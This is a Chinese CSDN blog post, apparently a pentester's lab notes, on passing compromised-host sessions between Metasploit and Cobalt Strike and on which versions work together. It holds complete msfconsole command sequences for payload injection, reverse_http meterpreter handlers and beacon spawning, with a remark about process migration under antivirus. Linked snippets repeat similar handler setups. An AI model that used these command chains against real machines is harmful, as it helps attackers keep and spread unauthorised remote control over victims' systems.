MSF与CS之间会话传递,互相派生,版本问题踩坑

已于 2023-10-14 22:03:15 修改
阅读量435 收藏 1
点赞数
文章标签: 数据库 服务器 运维 网络安全 安全威胁分析
于 2023-10-12 19:54:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_29060627/article/details/133798087
版权

查看kali版本:

┌──(root㉿kali)-[~]
└─# msfconsole -V
Framework Version: 6.1.27-dev
                                                                                                                                                                                                        
┌──(root㉿kali)-[~]
└─# cat /etc/os-release    
PRETTY_NAME="Kali GNU/Linux Rolling"
NAME="Kali GNU/Linux"
ID=kali
VERSION="2022.1"
VERSION_ID="2022.1"
VERSION_CODENAME="kali-rolling"
ID_LIKE=debian
ANSI_COLOR="1;31"
HOME_URL="https://www.kali.org/"
SUPPORT_URL="https://forums.kali.org/"
BUG_REPORT_URL="https://bugs.kali.org/"
                                                                                                                                                                                                        
┌──(root㉿kali)-[~]
└─#

cobaltstrike使用版本4.5,可以msf派生给cs4.5,但是反过来cs4.5不能派生给msf,

得换cobaltstrike4.0至4.4(2023-10-14测试)的版本,试过cs3.14版,不能派生给msf6.1,版本毕竟隔太远了

2023.10.14测试发现cs4.7也支持(派生给msf6),可能就是我下载cs4.5有问题(Cobalt Strike 4.X全版本启动器):

https://www.cnblogs.com/XuyeZi/p/16505470.htmlicon-default.png?t=N7T8https://www.cnblogs.com/XuyeZi/p/16505470.html

msf派生给cs(cs4.3和cs4.5都可以)(192.168.50.1:80 是cs的windows/beacon_httpreverse_http监听器):

use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set lhost 192.168.50.1
# cs4.1 ipaddr : 192.168.50.1
set lport 80        
set DisablePayloadHandler True
set PrependMigrate True
set session 1   
run

cs4.3派生给msf,不管cs4.3的beacon是x64还是x86,派生给msf的exploit/multi/handler都是x86:

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
#set autorunscript post/windows/manage/migrate name=services.exe 
# 一迁移就会话超时(安装了360和火绒,即使退出了,也有进程在)
set lhost 192.168.50.130
# kali ipaddr : 192.168.50.130
set lport 6666
set ExitOnSession false
set SessionExpirationTimeout 0 
set SessionCommunicationTimeout 0 
exploit -j -z

这个地方显示x86,不知道能搞成x64吗?

beacon> spawn msf
[*] Tasked beacon to spawn (x86) windows/foreign/reverse_http (192.168.50.130:6666)
[+] host called home, sent: 807 bytes
beacon>

安河桥北2025
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【经验总结】CSMSF之间会话传递
TeamsSix 的 CSDN 空间
01-29 2367
0x00 前言 众所周知,Cobalt Strike 的前身是 Armitage,而 Armitage 又可以理解为 Metasploit Framework 的图形界面版,因此 Cobalt Strike 与 Metasploit Framework 在很多地方都是兼容的,所以我们便可以将 Metasploit Framework 攻击产生的会话传递到 Cobalt Strike 上,同样的 Cobalt Strike 的会话也能够传递到 Metasploit Framework Metasplo
通信与网络中的MSF基于组件的业务框架
11-14
MSF定义的基于组件的业务框架如图所示。该框架包括业务组件和业务代理两大主要功能。业务组件是捆绑或集成在一起的多个业务对象,用来创建销售给用户的业务,有三种类型的业务组件。  图 MSF基于组件的业务框架 ...
msfcs联动
bring_coco的博客
05-18 1928
环境:kali(192.168.190.128)NATAPP。
CSMSF联动/shell互相反弹
qq_59468567的博客
04-12 290
set DisablePayloadHandler true #默认情况下,payload_inject执行之后会在本地产生一个新的handler,由于已经有了一个不需要再产生一个,所以这里设置为true。set payload windows/meterpreter/reverse_http #两边的payload协议一定要对应的。先建立一个监听器,和msf的要一一对应,上面的ip必须是可以ping通的大部分情况是外网ip。此处标红的对应下面的两个,取决加不加。然后返回前面的增加会话
msf联动cs
hmysn的博客
12-31 2092
Cobalt Strike简称CS 用于团队作战使用,由一个服务端和多个客户端组成,能让多个攻击者这在一个团队服务器上共享目标资源和信息,我们在使用msf获得权限以后,可以将信息共享到cs上,使用cs来进行监听以及其他的操作。
CS联动MSF
m0_72125469的博客
05-27 515
cobalt strike(简称CS)及Metasploit(简称msf)各有所长,cs更适合作为稳控平台,msf更适用于与各类内网信息搜集及漏洞利用。为了取长补短,我们进行联动。
CS会话派生MSF会话
weixin_43047908的博客
08-16 1623
目录前言环境设置外部监听msf建立监听CS派生会话msf的shell传给CS 前言 有时候,我们通过cs拿到一些机器的shell,想利用msf中的一些功能,这个时候,需要我们将shell传给msf之中,这也是本文的主要内容。 另外,msf也可以将shell传给CS。但是因为CS拿shell比较方便,所以,多数情况下是CS传给MSF。 环境设置 我们cs已经拿下一台机器的shell。不在过多赘述。 外部监听 msf建立监听 注意,“ lhost ”是指本机IP的意思;“ rhost ”才是目标机器的IP
MSF与CobaltStrike联动相互会话派生,并通过MSF进行内网攻击
da_chuan_chuan的博客
04-27 1516
文章目录前言一、将CS会话派生MSF1、前期准备:2、Cobaltstrike派生会话MSF二、MSF进行内网攻击1、前言:2、攻击步骤如下三、将MSF中的会话派生CS1、前言2、使用步骤:总结 前言 本文主要介绍MSF与CobaltStrike联动相互进行会话派生,这样可以最大化利用这两个工具的优点。同时这里还进行了衍生,通过将会话传到MSF上,MSF通过添加路由来访问内网主机,再用MSF进行永恒之蓝攻击拿下shell,并派生回CobaltStrkie。 当前网络设置为: 一、将CS会话
msfcs互传shell
good good study
04-19 2586
因为cobaltstrike和MSF各有优势,所有有时候需要互传shell。假设cs此时获取了一个shell,然后需要将此shell传给msf 1. 在msf中创建反向监听 use exploit/multi/handler set payload windows/meterpreter/reverse_http set lhost 192.168.
2021-06-30csmsf联动派生会话shell
qq_45290991的博客
06-30 610
一、当cs获取到会话后反弹给msf 1、msf上操作 use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.52.208 set lport 7777 exploit -j #-j 后台监听 12345 2、...
CSMSF联动之派生会话
Zlirving_的博客
02-19 1627
CS 派生会话MSF 当我们CS上线后,先打开msf,启动监听模块 use exploit/multi/handler set payload windows/meterpreter/reverse_http set lhost xxxx set lport xxxx exploit 然后在CS新建一个外部监听 两边的payload协议一定要对应的 然后选择需要派生会话右击—>Spawn然后选择刚刚创建的监听 MSF 派生会话CS 先在 cs 开启监听,Cobalt Strike-&g
基础电子中的MSF业务框架与IMS的关系
11-14
MSF和36PP对于在下一代网络中快速有效地进行新业务开发的需求认识是一致的,因此,MSF的业务框架和36PP IMS的业务平台之间必然存在着紧密的关系。通过对MSF业务框架和IMS业务平台的分析,可以看出MSF中的业务代理...
通信与网络中的MSF250的DS1/E1信号格式
12-10
摘要:MSF250是一个多业务成帧芯片。它带有DS1/E1接口,可将28个DS1或21个E1信号以位异步方式映射/解映射到VT.5/TU2路径中。文章从各种不同的帧格式和成帧原理论述了MSF250在DS1/E1映射/解映射中的...
E004-渗透测试常用工具-使用MSF实现Web传递获取靶机权限.pdf
12-02
E004-渗透测试常用工具-使用MSF实现Web传递获取靶机权限
基于MSF的增强版多源传感器融合框架 (VSLAMIMUGNSS).zip
01-24
需要提前说明的是,由于原始MSF文章公式的错误和代码的问题,导致研究者者直接阅读代码和看文章公式推导会存在疑惑,这里我都将一一解答。此外,鉴于KITTI数据集本身的缺陷,以及跑MSF的需要等原因,要想完整跑出...
如何mysql数据导入到mongdb
codemami的博客
05-30 1166
由于MySQL和MongoDB的数据模型不同(例如,MySQL使用关系模型,而MongoDB使用文档模型),你可能需要转换数据的格式。使用MongoDB驱动程序:你也可以使用MongoDB的官方驱动程序(如Python的pymongo)来编写脚本,将数据直接插入到MongoDB中。注意:如果你的JSON文件包含多个文档,并且它们不是作为数组的一部分(即每个文档都在其自己的行上),则需要使用--jsonArray选项。手动转换:对于小型数据集,你可以手动编辑SQL或CSV文件,将其转换为JSON格式。
【redis】Spring之RedisTemplate配置与使用
最新发布
05-30 323
转载:Spring之RedisTemplate配置与使用用过redis,但直接使用Jedis进行相应的交互操作,现在正好来看一下RedisTemplate是怎么实现的,以及使用起来是否更加便利。
书籍学习|基于SprinBoot+vue的书籍学习平台(源码+数据库+文档)
JIngJaneIL的博客
05-28 1197
首先,论文一开始便是清楚的论述了平台的研究内容。其次,剖析平台需求分析,弄明白“做什么”,分析包括业务分析和业务流程的分析以及用例分析,更进一步明确平台的需求。然后在明白了平台的需求基础上需要进一步地设计平台,主要包罗软件架构模式、整体功能模块、数据库设计。本项目软件架构选择B/S模式和java技术,总体功能模块运用自顶向下的分层思想。再然后就是实现平台并进行代码编写实现功能。论文的最后章节总结一下自己完成本论文和开发本项目的心得和总结。通过书籍学习平台将会使书籍学习各个方面的工作效率带来实质性的提升。
msf升级shell
08-06
根据引用和引用中的信息,要在Metasploit Framework (MSF)中升级shell,可以按照以下步骤进行操作: 1. 首先,确保已经建立了与目标主机的连接,并且已经获取到了一个正常的shell会话。 2. 使用命令sessions -u [会话ID将shell升级为meterpreter shell。这样可以将MSF会话派生到Cobalt Strike (CS)。 3. 接下来,可以将MSF中的会话派生CS。具体步骤如下: a. 进入到Cobalt Strike的上下文中。 b. 使用命令migrate [目标进程ID将shell移动到指定的进程中。例如,可以使用命令migrate448将shell迁移到进程ID为448的进程中。 c. 输入getpid命令来确认shell已经成功迁移到目标进程中。 这样,你就成功地将MSF中的shell升级到了meterpreter shell,并将其派生到了Cobalt Strike会话中。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值